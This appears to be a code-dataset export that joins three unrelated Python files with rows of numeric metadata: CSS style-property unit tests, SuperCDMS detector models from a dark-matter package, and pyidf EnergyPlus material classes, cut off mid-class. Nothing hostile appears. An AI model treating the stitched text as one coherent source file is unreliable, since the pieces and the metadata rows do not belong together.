self.assertTrue(node.style.dirty)
def test_property_with_choices(self):
node = TestNode(style=CSS())
node.layout.dirty = None
# Default value is INLINE
self.assertIs(node.style.display, INLINE)
self.assertIsNone(node.style.dirty)
# Try to provide a value that isn't on the choices list
with self.assertRaises(ValueError):
node.style.display = 10
# Use a valid value
node.style.display = BLOCK
self.assertIs(node.style.display, BLOCK)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set the value to the same value.
# Dirty flag is not set.
node.style.display = BLOCK
self.assertIs(node.style.display, BLOCK)
self.assertFalse(node.style.dirty)
# Set the value to something new
# Dirty flag is set.
node.style.display = TABLE
self.assertIs(node.style.display, TABLE)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Clear the property
del node.style.display
self.assertIs(node.style.display, INLINE)
self.assertTrue(node.style.dirty)
def test_directional_property(self):
node = TestNode(style=CSS())
node.layout.dirty = None
# Default value is 0
self.assertEqual(node.style.margin, (0, 0, 0, 0))
self.assertEqual(node.style.margin_top, 0)
self.assertEqual(node.style.margin_right, 0)
self.assertEqual(node.style.margin_bottom, 0)
self.assertEqual(node.style.margin_left, 0)
self.assertIsNone(node.style.dirty)
# Set a value in one axis
node.style.margin_top = 10
self.assertEqual(node.style.margin, (10, 0, 0, 0))
self.assertEqual(node.style.margin_top, 10)
self.assertEqual(node.style.margin_right, 0)
self.assertEqual(node.style.margin_bottom, 0)
self.assertEqual(node.style.margin_left, 0)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set a value directly with a single item
node.style.margin = (10,)
self.assertEqual(node.style.margin, (10, 10, 10, 10))
self.assertEqual(node.style.margin_top, 10)
self.assertEqual(node.style.margin_right, 10)
self.assertEqual(node.style.margin_bottom, 10)
self.assertEqual(node.style.margin_left, 10)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set a value directly with a single item
node.style.margin = 30
self.assertEqual(node.style.margin, (30, 30, 30, 30))
self.assertEqual(node.style.margin_top, 30)
self.assertEqual(node.style.margin_right, 30)
self.assertEqual(node.style.margin_bottom, 30)
self.assertEqual(node.style.margin_left, 30)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set a value directly with a 2 values
node.style.margin = (10, 20)
self.assertEqual(node.style.margin, (10, 20, 10, 20))
self.assertEqual(node.style.margin_top, 10)
self.assertEqual(node.style.margin_right, 20)
self.assertEqual(node.style.margin_bottom, 10)
self.assertEqual(node.style.margin_left, 20)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set a value directly with a 3 values
node.style.margin = (10, 20, 30)
self.assertEqual(node.style.margin, (10, 20, 30, 20))
self.assertEqual(node.style.margin_top, 10)
self.assertEqual(node.style.margin_right, 20)
self.assertEqual(node.style.margin_bottom, 30)
self.assertEqual(node.style.margin_left, 20)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Set a value directly with a 4 values
node.style.margin = (10, 20, 30, 40)
self.assertEqual(node.style.margin, (10, 20, 30, 40))
self.assertEqual(node.style.margin_top, 10)
self.assertEqual(node.style.margin_right, 20)
self.assertEqual(node.style.margin_bottom, 30)
self.assertEqual(node.style.margin_left, 40)
self.assertTrue(node.style.dirty)
# Set a value directly with an invalid number of values
with self.assertRaises(ValueError):
node.style.margin = ()
with self.assertRaises(ValueError):
node.style.margin = (10, 20, 30, 40, 50)
# Clean the layout
node.layout.dirty = False
# Clear a value on one axis
del node.style.margin_top
self.assertEqual(node.style.margin, (0, 20, 30, 40))
self.assertEqual(node.style.margin_top, 0)
self.assertEqual(node.style.margin_right, 20)
self.assertEqual(node.style.margin_bottom, 30)
self.assertEqual(node.style.margin_left, 40)
self.assertTrue(node.style.dirty)
# Restore the top margin
node.style.margin_top = 10
# Clean the layout
node.layout.dirty = False
# Clear a value directly
del node.style.margin
self.assertEqual(node.style.margin, (0, 0, 0, 0))
self.assertEqual(node.style.margin_top, 0)
self.assertEqual(node.style.margin_right, 0)
self.assertEqual(node.style.margin_bottom, 0)
self.assertEqual(node.style.margin_left, 0)
self.assertTrue(node.style.dirty)
def test_set_multiple_properties(self):
node = TestNode(style=CSS())
node.layout.dirty = None
node.style.set(width=10, height=20)
self.assertEqual(node.style.width, 10)
self.assertEqual(node.style.height, 20)
self.assertIs(node.style.top, AUTO)
self.assertTrue(node.style.dirty)
# Clear properties
node.style.set(width=None, top=30)
self.assertIs(node.style.width, AUTO)
self.assertEqual(node.style.height, 20)
self.assertEqual(node.style.top, 30)
self.assertTrue(node.style.dirty)
# Clean the layout
node.layout.dirty = False
# Setting a non-property
with self.assertRaises(NameError):
node.style.set(not_a_property=10)
self.assertFalse(node.style.dirty)
def test_str(self):
node = TestNode(style=CSS())
node.layout.dirty = None
node.style.set(
width=10,
height=20,
margin=(30, 40, 50, 60),
display=BLOCK
)
self.assertEqual(
str(node.style),
"display: block; height: 20px; "
"margin-bottom: 50px; margin-left: 60px; "
"margin-right: 40px; margin-top: 30px; width: 10px"
)
| 32.038462
| 101
| 0.594603
| 2,260
| 19,159
| 4.990265
| 0.077876
| 0.111722
| 0.102766
| 0.12981
| 0.853786
| 0.834368
| 0.793669
| 0.738695
| 0.724153
| 0.687711
| 0
| 0.025149
| 0.306801
| 19,159
| 597
| 102
| 32.092127
| 0.824034
| 0.100057
| 0
| 0.726161
| 0
| 0.002445
| 0.060814
| 0
| 0
| 0
| 0
| 0
| 0.408313
| 1
| 0.03912
| false
| 0
| 0.017115
| 0
| 0.080685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb927186df338b0e3908bf5b3088e6f7cda90bb7
| 11,924
|
py
|
Python
|
dddm/detectors/super_cdms.py
|
JoranAngevaare/dddm
|
3461e37984bac4d850beafecc9d1881b84fb226c
|
[
"MIT"
] | null | null | null |
dddm/detectors/super_cdms.py
|
JoranAngevaare/dddm
|
3461e37984bac4d850beafecc9d1881b84fb226c
|
[
"MIT"
] | 85
|
2021-09-20T12:08:53.000Z
|
2022-03-30T12:48:06.000Z
|
dddm/detectors/super_cdms.py
|
JoranAngevaare/dddm
|
3461e37984bac4d850beafecc9d1881b84fb226c
|
[
"MIT"
] | null | null | null |
import typing as ty
from abc import ABC
from .experiment import Experiment, lindhard_quenching_factor, _get_nr_resolution
import numpy as np
import dddm
from functools import partial
export, __all__ = dddm.exporter()
class _BaseSuperCdms(Experiment, ABC):
"""Base class of superCDMS to introduce shared properties"""
location = "SNOLAB"
# Parameters needed for eq. 3, 4 of https://arxiv.org/pdf/1610.00006.pdf
# Since they are not directly used, they are not set as class attributes
_energy_parameters = dict(
si_hv={'Z': 14,
'k': 0.161,
'epsilon': 0.003,
'e_delta_v': 0.1,
'e_thr_phonon': 100e-3,
'sigma_phonon': 5e-3,
'sigma_ion': np.nan, # Only phonons
},
si_izip={'Z': 14,
'k': 0.161,
'epsilon': 0.003,
'e_delta_v': 0.008,
'e_thr_phonon': 175e-3,
'sigma_phonon': 25e-3,
'sigma_ion': 110e-3,
},
ge_hv={'Z': 32,
'k': 0.162,
'epsilon': 0.00382,
'e_delta_v': 0.1,
'e_thr_phonon': 100e-3,
'sigma_phonon': 10e-3,
'sigma_ion': np.nan, # Only phonons
},
ge_izip={'Z': 32,
'k': 0.162,
'epsilon': 0.00382,
'e_delta_v': 0.006,
'e_thr_phonon': 350e-3,
'sigma_phonon': 50e-3,
'sigma_ion': 100e-3,
},
)
def get_energy_thr_ee_from_phonon_thr(self) -> ty.Union[float, int]:
"""get the energy threshold (ee) based on the energy_parameters"""
assert self.interaction_type == 'migdal_SI'
this_conf = self._energy_parameters[self.detector_key]
return energy_ee_from_energy_phonon(
e_ph=this_conf['e_thr_phonon'],
e_delta_v=this_conf['e_delta_v'],
epsilon=this_conf['epsilon']
)
def get_energy_res_ee_from_phonon_res(self) -> ty.Union[float, int]:
"""get the energy resolution (ee) based on the energy_parameters"""
assert self.interaction_type == 'migdal_SI'
this_conf = self._energy_parameters[self.detector_key]
return energy_ee_from_energy_phonon(
e_ph=this_conf['sigma_phonon'],
e_delta_v=this_conf['e_delta_v'],
epsilon=this_conf['epsilon']
)
def energy_nr_to_detectable_energy_function(self) -> ty.Callable:
"""
Get phonon energy (hv) or ionization energy (izip) from nuclear recoil energy
"""
assert self.interaction_type == 'SI'
det_key = self.detector_key
this_conf = self._energy_parameters[det_key]
if 'izip' in det_key:
return partial(energy_ionization_from_e_nr,
Z=this_conf['Z'],
k=this_conf['k'],
)
if 'hv' in det_key:
return partial(energy_phonon_from_energy_nr,
Z=this_conf['Z'],
k=this_conf['k'],
e_delta_v=this_conf['e_delta_v'],
epsilon=this_conf['epsilon'],
)
raise ValueError(f'got {det_key}?!')
@property
def detector_key(self) -> str:
material = self.target_material.lower()
if 'hv' in self.detector_name.lower():
return f'{material}_hv'
assert 'izip' in self.detector_name.lower()
return f'{material}_izip'
@export
class SuperCdmsHvGeNr(_BaseSuperCdms):
detector_name = 'SuperCDMS_HV_Ge_NR'
target_material = 'Ge'
interaction_type = 'SI'
__version__ = '0.0.0'
exposure_tonne_year = 44 * 1.e-3 # Tonne year
energy_threshold_kev = 40. / 1e3 # table VIII, Enr
cut_efficiency = 0.85 # p. 11, right column
detection_efficiency = 0.85 # p. 11, left column NOTE: ER type!
def resolution(self, energies_in_kev):
"""Flat resolution"""
phonon_energy_from_nr = self.energy_nr_to_detectable_energy_function()
phonon_resolution = self._energy_parameters[self.detector_key]['sigma_phonon']
return _get_nr_resolution(energies_in_kev, phonon_energy_from_nr, phonon_resolution)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 27 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsHvSiNr(_BaseSuperCdms):
detector_name = 'SuperCDMS_HV_Si_NR'
target_material = 'Si'
interaction_type = 'SI'
__version__ = '0.0.0'
exposure_tonne_year = 9.6 * 1.e-3 # Tonne year
energy_threshold_kev = 78. / 1e3 # table VIII, Enr
cut_efficiency = 0.85 # p. 11, right column
detection_efficiency = 0.85 # p. 11, left column NOTE: ER type!
def resolution(self, energies_in_kev):
"""Flat resolution"""
phonon_energy_from_nr = self.energy_nr_to_detectable_energy_function()
phonon_resolution = self._energy_parameters[self.detector_key]['sigma_phonon']
return _get_nr_resolution(energies_in_kev, phonon_energy_from_nr, phonon_resolution)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 300 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsIzipGeNr(_BaseSuperCdms):
detector_name = 'SuperCDMS_iZIP_Ge_NR'
target_material = 'Ge'
interaction_type = 'SI'
__version__ = '0.0.0'
exposure_tonne_year = 56 * 1.e-3 # Tonne year
energy_threshold_kev = 272. / 1e3 # table VIII, Enr
cut_efficiency = 0.75 # p. 11, right column
detection_efficiency = 0.85 # p. 11, left column
def resolution(self, energies_in_kev):
"""Flat resolution"""
ionization_energy_from_nr = self.energy_nr_to_detectable_energy_function()
ionization_resolution = self._energy_parameters[self.detector_key]['sigma_ion']
return _get_nr_resolution(energies_in_kev, ionization_energy_from_nr, ionization_resolution)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 3300e-6 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsIzipSiNr(_BaseSuperCdms):
detector_name = 'SuperCDMS_iZIP_Si_NR'
target_material = 'Si'
interaction_type = 'SI'
__version__ = '0.0.0'
exposure_tonne_year = 4.8 * 1.e-3 # Tonne year
energy_threshold_kev = 166. / 1e3 # table VIII, Enr
cut_efficiency = 0.75 # p. 11, right column
detection_efficiency = 0.85 # p. 11, left column
def resolution(self, energies_in_kev):
"""Flat resolution"""
ionization_energy_from_nr = self.energy_nr_to_detectable_energy_function()
ionization_resolution = self._energy_parameters[self.detector_key]['sigma_ion']
return _get_nr_resolution(energies_in_kev, ionization_energy_from_nr, ionization_resolution)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 2900e-6 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsHvGeMigdal(_BaseSuperCdms):
detector_name = 'SuperCDMS_HV_Ge_Migdal'
target_material = 'Ge'
interaction_type = 'migdal_SI'
__version__ = '0.0.0'
exposure_tonne_year = 44 * 1.e-3 # Tonne year
cut_efficiency = 0.85 # p. 11, right column
detection_efficiency = 0.5 # p. 11, left column NOTE: migdal is ER type!
@property
def energy_threshold_kev(self):
return self.get_energy_thr_ee_from_phonon_thr()
def resolution(self, energies_in_kev):
"""Flat resolution"""
e_res_ee = self.get_energy_res_ee_from_phonon_res()
return self._flat_resolution(len(energies_in_kev), e_res_ee)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 27 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsHvSiMigdal(_BaseSuperCdms):
detector_name = 'SuperCDMS_HV_Si_Migdal'
target_material = 'Si'
interaction_type = 'migdal_SI'
__version__ = '0.0.0'
exposure_tonne_year = 9.6 * 1.e-3 # Tonne year
cut_efficiency = 0.85 # p. 11, right column
detection_efficiency = 0.675 # p. 11, left column NOTE: migdal is ER type!
@property
def energy_threshold_kev(self):
return self.get_energy_thr_ee_from_phonon_thr()
def resolution(self, energies_in_kev):
"""Flat resolution"""
e_res_ee = self.get_energy_res_ee_from_phonon_res()
return self._flat_resolution(len(energies_in_kev), e_res_ee)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 300 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsIzipGeMigdal(_BaseSuperCdms):
detector_name = 'SuperCDMS_iZIP_Ge_Migdal'
target_material = 'Ge'
interaction_type = 'migdal_SI'
__version__ = '0.0.0'
exposure_tonne_year = 56 * 1.e-3 # Tonne year
cut_efficiency = 0.75 # p. 11, right column
detection_efficiency = 0.5 # p. 11, left column NOTE: migdal is ER type!
@property
def energy_threshold_kev(self):
return self.get_energy_thr_ee_from_phonon_thr()
def resolution(self, energies_in_kev):
"""Flat resolution"""
e_res_ee = self.get_energy_res_ee_from_phonon_res()
return self._flat_resolution(len(energies_in_kev), e_res_ee)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 22 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
@export
class SuperCdmsIzipSiMigdal(_BaseSuperCdms):
detector_name = 'SuperCDMS_iZIP_Si_Migdal'
target_material = 'Si'
interaction_type = 'migdal_SI'
__version__ = '0.0.0'
exposure_tonne_year = 4.8 * 1.e-3 # Tonne year
cut_efficiency = 0.75 # p. 11, right column
detection_efficiency = 0.675 # p. 11, left column NOTE: migdal is ER type!
@property
def energy_threshold_kev(self):
return self.get_energy_thr_ee_from_phonon_thr()
def resolution(self, energies_in_kev):
"""Flat resolution"""
e_res_ee = self.get_energy_res_ee_from_phonon_res()
return self._flat_resolution(len(energies_in_kev), e_res_ee)
def background_function(self, energies_in_kev):
"""Flat bg rate"""
bg_rate_nr = 370 # counts/kg/keV/year
conv_units = 1.0e3 # Tonne
return self._flat_background(len(energies_in_kev), bg_rate_nr * conv_units)
def energy_ee_from_energy_phonon(e_ph, e_delta_v, epsilon):
"""Eq. 4 in https://arxiv.org/abs/1610.00006 rewritten to ee
(`y`=1) and `eta`=1"""
return e_ph / (1 + e_delta_v / epsilon)
def energy_phonon_from_energy_nr(e_r_nr, Z, k, e_delta_v, epsilon):
y = lindhard_quenching_factor(e_r_nr, atomic_number_z=Z, k=k)
if not isinstance(y, np.ndarray):
raise ValueError
return e_r_nr * (1 + y * (e_delta_v / epsilon))
def energy_ionization_from_e_nr(e_r_nr, Z, k):
y = lindhard_quenching_factor(e_r_nr, atomic_number_z=Z, k=k)
if not isinstance(y, np.ndarray):
raise ValueError
return e_r_nr * y
| 37.031056
| 100
| 0.646344
| 1,629
| 11,924
| 4.361572
| 0.121547
| 0.045039
| 0.05855
| 0.038283
| 0.850387
| 0.83772
| 0.774947
| 0.75651
| 0.726953
| 0.72076
| 0
| 0.035843
| 0.253606
| 11,924
| 321
| 101
| 37.146417
| 0.762472
| 0.128145
| 0
| 0.658436
| 0
| 0
| 0.065649
| 0.009001
| 0
| 0
| 0
| 0
| 0.016461
| 1
| 0.111111
| false
| 0
| 0.024691
| 0.016461
| 0.547325
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
fbc57ff509fe0fdcfd51d82211eb83705dac0978
| 957,621
|
py
|
Python
|
pyidf/surface_construction_elements.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 19
|
2015-12-08T23:33:51.000Z
|
2022-01-31T04:41:10.000Z
|
pyidf/surface_construction_elements.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 2
|
2019-10-04T10:57:00.000Z
|
2021-10-01T06:46:17.000Z
|
pyidf/surface_construction_elements.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 7
|
2015-11-04T02:25:01.000Z
|
2021-12-08T03:14:28.000Z
|
""" Data objects in group "Surface Construction Elements"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class Material(DataObject):
"""Corresponds to IDD object `Material` Regular materials described with
full set of thermal properties."""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'roughness',
{'name': u'Roughness',
'pyname': u'roughness',
'required-field': True,
'autosizable': False,
'accepted-values': [u'VeryRough',
u'Rough',
u'MediumRough',
u'MediumSmooth',
u'Smooth',
u'VerySmooth'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'maximum': 3.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'density',
{'name': u'Density',
'pyname': u'density',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m3'}),
(u'specific heat',
{'name': u'Specific Heat',
'pyname': u'specific_heat',
'required-field': True,
'autosizable': False,
'minimum': 100.0,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K'}),
(u'thermal absorptance',
{'name': u'Thermal Absorptance',
'pyname': u'thermal_absorptance',
'default': 0.9,
'minimum>': 0.0,
'maximum': 0.99999,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar absorptance',
{'name': u'Solar Absorptance',
'pyname': u'solar_absorptance',
'default': 0.7,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'visible absorptance',
{'name': u'Visible Absorptance',
'pyname': u'visible_absorptance',
'default': 0.7,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 6,
'name': u'Material',
'pyname': u'Material',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def roughness(self):
"""field `Roughness`
Args:
value (str): value for IDD Field `Roughness`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `roughness` or None if not set
"""
return self["Roughness"]
@roughness.setter
def roughness(self, value=None):
"""Corresponds to IDD field `Roughness`"""
self["Roughness"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
| value <= 3.0
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Units: W/m-K
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=None):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def density(self):
"""field `Density`
| Units: kg/m3
Args:
value (float): value for IDD Field `Density`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `density` or None if not set
"""
return self["Density"]
@density.setter
def density(self, value=None):
"""Corresponds to IDD field `Density`"""
self["Density"] = value
@property
def specific_heat(self):
"""field `Specific Heat`
| Units: J/kg-K
| value >= 100.0
Args:
value (float): value for IDD Field `Specific Heat`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat` or None if not set
"""
return self["Specific Heat"]
@specific_heat.setter
def specific_heat(self, value=None):
"""Corresponds to IDD field `Specific Heat`"""
self["Specific Heat"] = value
@property
def thermal_absorptance(self):
"""field `Thermal Absorptance`
| Default value: 0.9
| value <= 0.99999
Args:
value (float): value for IDD Field `Thermal Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_absorptance` or None if not set
"""
return self["Thermal Absorptance"]
@thermal_absorptance.setter
def thermal_absorptance(self, value=0.9):
"""Corresponds to IDD field `Thermal Absorptance`"""
self["Thermal Absorptance"] = value
@property
def solar_absorptance(self):
"""field `Solar Absorptance`
| Default value: 0.7
| value <= 1.0
Args:
value (float): value for IDD Field `Solar Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_absorptance` or None if not set
"""
return self["Solar Absorptance"]
@solar_absorptance.setter
def solar_absorptance(self, value=0.7):
"""Corresponds to IDD field `Solar Absorptance`"""
self["Solar Absorptance"] = value
@property
def visible_absorptance(self):
"""field `Visible Absorptance`
| Default value: 0.7
| value <= 1.0
Args:
value (float): value for IDD Field `Visible Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_absorptance` or None if not set
"""
return self["Visible Absorptance"]
@visible_absorptance.setter
def visible_absorptance(self, value=0.7):
"""Corresponds to IDD field `Visible Absorptance`"""
self["Visible Absorptance"] = value
class MaterialNoMass(DataObject):
""" Corresponds to IDD object `Material:NoMass`
Regular materials properties described whose principal description is R (Thermal Resistance)
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'roughness',
{'name': u'Roughness',
'pyname': u'roughness',
'required-field': True,
'autosizable': False,
'accepted-values': [u'VeryRough',
u'Rough',
u'MediumRough',
u'MediumSmooth',
u'Smooth',
u'VerySmooth'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thermal resistance',
{'name': u'Thermal Resistance',
'pyname': u'thermal_resistance',
'required-field': True,
'autosizable': False,
'minimum': 0.001,
'autocalculatable': False,
'type': u'real',
'unit': u'm2-K/W'}),
(u'thermal absorptance',
{'name': u'Thermal Absorptance',
'pyname': u'thermal_absorptance',
'default': 0.9,
'minimum>': 0.0,
'maximum': 0.99999,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar absorptance',
{'name': u'Solar Absorptance',
'pyname': u'solar_absorptance',
'default': 0.7,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'visible absorptance',
{'name': u'Visible Absorptance',
'pyname': u'visible_absorptance',
'default': 0.7,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 3,
'name': u'Material:NoMass',
'pyname': u'MaterialNoMass',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def roughness(self):
"""field `Roughness`
Args:
value (str): value for IDD Field `Roughness`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `roughness` or None if not set
"""
return self["Roughness"]
@roughness.setter
def roughness(self, value=None):
"""Corresponds to IDD field `Roughness`"""
self["Roughness"] = value
@property
def thermal_resistance(self):
"""field `Thermal Resistance`
| Units: m2-K/W
| value >= 0.001
Args:
value (float): value for IDD Field `Thermal Resistance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_resistance` or None if not set
"""
return self["Thermal Resistance"]
@thermal_resistance.setter
def thermal_resistance(self, value=None):
"""Corresponds to IDD field `Thermal Resistance`"""
self["Thermal Resistance"] = value
@property
def thermal_absorptance(self):
"""field `Thermal Absorptance`
| Default value: 0.9
| value <= 0.99999
Args:
value (float): value for IDD Field `Thermal Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_absorptance` or None if not set
"""
return self["Thermal Absorptance"]
@thermal_absorptance.setter
def thermal_absorptance(self, value=0.9):
"""Corresponds to IDD field `Thermal Absorptance`"""
self["Thermal Absorptance"] = value
@property
def solar_absorptance(self):
"""field `Solar Absorptance`
| Default value: 0.7
| value <= 1.0
Args:
value (float): value for IDD Field `Solar Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_absorptance` or None if not set
"""
return self["Solar Absorptance"]
@solar_absorptance.setter
def solar_absorptance(self, value=0.7):
"""Corresponds to IDD field `Solar Absorptance`"""
self["Solar Absorptance"] = value
@property
def visible_absorptance(self):
"""field `Visible Absorptance`
| Default value: 0.7
| value <= 1.0
Args:
value (float): value for IDD Field `Visible Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_absorptance` or None if not set
"""
return self["Visible Absorptance"]
@visible_absorptance.setter
def visible_absorptance(self, value=0.7):
"""Corresponds to IDD field `Visible Absorptance`"""
self["Visible Absorptance"] = value
class MaterialInfraredTransparent(DataObject):
""" Corresponds to IDD object `Material:InfraredTransparent`
Special infrared transparent material. Similar to a Material:Nomass with low thermal resistance.
High absorptance in both wavelengths.
Area will be doubled internally to make internal radiant exchange accurate.
Should be only material in single layer surface construction.
All thermal properties are set internally. User needs only to supply name.
Cannot be used with ConductionFiniteDifference solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 1,
'name': u'Material:InfraredTransparent',
'pyname': u'MaterialInfraredTransparent',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
class MaterialAirGap(DataObject):
""" Corresponds to IDD object `Material:AirGap`
Air Space in Opaque Construction
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'thermal resistance',
{'name': u'Thermal Resistance',
'pyname': u'thermal_resistance',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm2-K/W'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 2,
'name': u'Material:AirGap',
'pyname': u'MaterialAirGap',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def thermal_resistance(self):
"""field `Thermal Resistance`
| Units: m2-K/W
Args:
value (float): value for IDD Field `Thermal Resistance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_resistance` or None if not set
"""
return self["Thermal Resistance"]
@thermal_resistance.setter
